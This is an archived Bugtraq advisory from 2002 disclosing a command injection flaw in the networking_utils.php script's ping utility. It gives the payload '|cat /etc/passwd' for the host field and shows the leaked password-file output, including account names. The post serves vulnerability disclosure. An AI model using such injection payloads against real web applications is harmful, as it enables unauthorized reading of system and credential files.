Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

networking_utils.php

From: Tacettin Karadeniz <tacettinkaradeniz () yahoo com>
Date: Tue, 5 Nov 2002 13:05:56 -0800 (PST)
Title:
The bug in networking_utils.php
(http://www.sourcecraft.org/downloads)
networking_utils(PHP) Show Files Vulnerability

Summary:
networking_utils.php
Includes a ping function, a traceroute function, and
an nslookup function.

Vulnerable systems:
networking_utils
networking_utils.php of the networking_utils php
script allows remote visitors 
to view any file on a webserver. 

Example:
The command which is written to Domain name or Ip
address part(Ping Utility):

|cat /etc/passwd

by this command, password file to view in the web
browser.


Ping Results For : |cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
mysql:x:415:415:MySQL server:/var/lib/mysql:/bin/bash
cilek:x:501:501:cilek:/home/cilek:/bin/bash
avicenna:x:502:502:Avicenna:/home/avicenna:/bin/bash

__________________________________________________
Do you Yahoo!?
HotJobs - Search new jobs daily now
http://hotjobs.yahoo.com/
Previous By Date Next
Previous By Thread Next

Current thread: